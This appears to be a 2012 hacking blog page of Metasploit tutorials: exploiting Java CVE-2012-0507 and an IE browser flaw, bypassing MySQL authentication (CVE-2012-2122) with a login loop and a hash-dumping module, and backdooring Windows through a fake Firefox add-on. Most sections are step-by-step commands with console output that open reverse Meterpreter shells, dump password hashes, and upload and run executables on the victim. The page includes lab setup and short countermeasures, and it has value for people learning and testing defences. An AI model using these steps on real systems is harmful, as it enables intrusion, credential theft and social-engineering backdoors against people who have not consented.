
Ok, let us launch the exploit.

Type "exploit" in the console.


Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Continue   Reading>>

Tuesday, June 12, 2012

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB


The news about the vulnerability in MySQL and MariaDB spreads like a wild fire. I have covered about this vulnerability in E Hacking news as news article. Here, i am going to share the same thing from the perspective of a penetration tester.

The MySQL and MariaDB versions 5.161,5.2.11,5.3.5 and 5.5.c2 are affected version.

The vulnerability allows an attacker to access MySQL database without inputing proper authentication credentials. The vulnerability can only exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range.

According to Gokubchik the gcc build in memcmp and BSD libc are safe bu the linux glibc sse-optimised memcmp is not safe.

Not all linux distros are affected, only the following systems are vulnerable:
*ubuntu linux 64 bit(10.04,11.10,11.04,12.04)
*openSUSE 12.1 64 bit MySQL 5.5.23-log
*Debin Unstable 64 bit 5.5.23.2
*Fedora
*Arch Linux

In order to test the vulnerability, run the followoing bash script:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.12>/dev/null; done

The above code will provide access to an affectte MySQL Server as the root user account.

The following video is provided by one of EHN reader:


Exploiting using Metasploit :
one of metasploit contributor committee a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306Authentication bypass is 10% complete
[*] 127.0.0.1:3306Authentication bypass is 20% complete
[*] 127.0.0.1:3306Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Continue   Reading>>

Saturday, May 26, 2012

Tuesday, May 22, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials


Hello BTS readers, i believe you enjoyed my last tutorial ( Java AtomicReferenceArray type violation vulnerability and exploiting ). So here is second tutorial for you ! In this tutorial i am going to explain how to hack any windows machine(xp,7) with the help of Metasploit.

Unlike last tutorial, we are not going to exploit any kind of vulnerabilities. We are going to use Social Engineering technique instead.

What exactly i am going to do?!
  1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
  2. Trick users into installing the add-on
  3. Break into the Target Machine.
Pre-configuration:
  • As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target" and "Attacker".
  • Install the windows xp or 7 in the Target VM.
  • Install the Backtrack in the Attacker VM.
need help in configuring the VM?! you can read this tutorial "Set up pentesting lab".

Part I: Update the Metasploit 
As we are going to use the latest module, you are advised to update the Metasploit modules.  Don't know how to do this? No need to worry!
  • Open the Terminal 
  • type msfupdate
  • This will update the Metasploit with latest modules :)
Part II: Configuring settings in Metasploit for the fake-addon exploit
Step 1:

Open the Terminal and type "msfconsole" to get the Metasploit console.

Step 2:
Type "use exploit/multi/browser/firefox_xpi_bootstrapped_addon" in the console.

Step 3:
Now we have to know the list of settings available for this exploit module.  In order to get the list , you can type "show options" in the console.

Unlike the last tutorial, this module has an extra settings for the module namely "addonname".

Step 4: Configurations
Let us configure the setting for the exploit.
type the highlighted commands one by one in the console

Command: set addonname fake
Details: Name for the fake add-on.  you can change the "fake" to any name.

Command:set SRVHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal. If you have trouble in getting the ip details, please drop your comment or read my previous post. 

Command: set SRVPORT 80
Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx
Details: The path in which the fake add-on will be available to download. For ex: http://192.168.56.11/fakeEx

Command: set LHOST 192.168.56.11 
Details: Here the 192.168.56.11 is the ip of Backtrack .  You can get this ip by simply typing the "ifconfig" in the terminal.

Step 5: Payload

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Part III: Social Engineering Attack

Successfully configured the settings for the exploit, what else?! let us launch the exploit.
Type "exploit" in the console.
Now the exploit is started.  Our fake add-on is available at, "http://192.168.56.11/fakeEx".

Once victim visit the link, it will ask user to install the add-on in order to view the page.  Once user install the add-on, the system will be backdoor-ed.




Now , You can control the victim system from meterpreter.


Countermeasures:
I believe you understand the risks of installing the add-on from unknown sources.  So, think twice before installing add-on .  Always use trusted add-on.  Search in the google for review about the add-on.

Disclaimer:
The article given here is educational purpose only.  We suggest you to try this method in a controlled virtualbox environment.  We are not responsible for your illegal activity. 
Continue   Reading>>

Sunday, May 13, 2012

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507




Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.
Continue   Reading>>

Friday, February 3, 2012

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?


Hi BTS readers,  We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:
  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:
Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:
Step 1:
click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:
open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101
Hacking with Pen Testing System:
open the Terminal  and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports.
Let me explain more details in my next article.

If you have trouble in installing or confused, comment here.  
Continue   Reading>>

Saturday, January 21, 2012

Complete Cross Site Scripting(XSS) Guide : Web Application Pen Testing


Hello BTS readers, Here is complete set of posts that explains everything about the Cross site scripting.  Still more articles are on the way, Stay tuned to BreakTheSec..!


Link To Tutorials:
PenTesting Lab to practice XSS attacks:
Continue   Reading>>

Wednesday, November 23, 2011

What is Penetration Testing and Pen Testing Distribution?


Penetration Testing(Pen Testing) is the act of evaluating the Security of system or network by exploiting vulnerabilities. This will determine whether unauthorized or malicious activity is possible in a system. Vulnerability uncovered through the Pen Testing will be presented to the system's owner.


Why Penetration Testing?

  • Pentetration testing can identify the vulnerabilities that is not identified by an automated vulnerability scanners.
  • Determining the feasibility of a particular set of attack vectors
  • Determining the Critical Vulerabilities .
  • Assessing the magnitude of potential business and operational impacts of successful attacks
  • Testing the ability of network defenders to successfully detect and respond to the attacks
  • Testing stability of the system against the DDOS attack.



White Box vs Black Box vs Grey Box Testing:
Penetration testing can be performed in different ways. The methods can be classified into three types based on the knowledge about the System being tested.

White Box:
In white box testing, Pen Tester know everything about the system such as source code,network diagrams, ip addressing info.

White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker(malicious insider) has access to source code, network layouts, and possibly even some passwords.

Black Box:
Pen Tester test the system without prior knowledge about the system. This method is also known as Blind Testing . Black box testing simulates an attack from someone who is unfamiliar(malicious outsiders) with the system.

Grey Box:
In this method, Pen Tester partially know about the system.

Web application penetration testing:
This testing will be used to find the following web application vulnerabilities:

  • SQL Injection
  • XSS(Cross site Scripting)
  • Buffer overflow
  • Clickjacking
  • DDOS
Penetration Testing Tool:
Penetration Testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis techniques alone.

As a Penetration Tester, you will need lot of Penetration testing tools to test the Security of system. Searching ,downloading and installing the required software may take time. You can use a Penetration Testing Distribution instead.

What is Pen Testing Distribution?
Penetration Testing Distribution is an open source Operating System(Derived from Linux/BSD) that combines all required application for testing the security of system. It is specially developed for Security Professionals(Pen Testers/EthicalHackers/Forensic Officers...)
Eg: Backtrack 5 Linux .

What is the advantage of Penetration Testing Distribution?
All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Distribution are open source and free to use. You can install in pen drive and bring it anywhere.

Continue   Reading>>

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?


Joomscan is one of penetration testing tool that help to find the vulnerability in Joomla CMS.   The Updated version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

Download the Joomscan from here:
http://web-center.si/joomscan/joomscan.tar.gz

Step 1: Moving to PenTest folder
Copy/Move the downloaded files in directory
 /pentest/web/scanners/joomscan/


Step2: Set Permission
Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).
CHMOD 0777 joomscan.pl 


Step 3: Update
Update the scanner to latest version. To do this, enter the following command in Terminal:
./joomscan.pl update


Step 4: Scanning for Vulnerability
Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal:
./joomscan.pl -u www.YourJoomlasite.com




Wait for a while, and it will list of the vulnerability found.

This tutorial is completely for Educational purpose only. This tutorial is for PenTester and Ethical Hackers .
Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com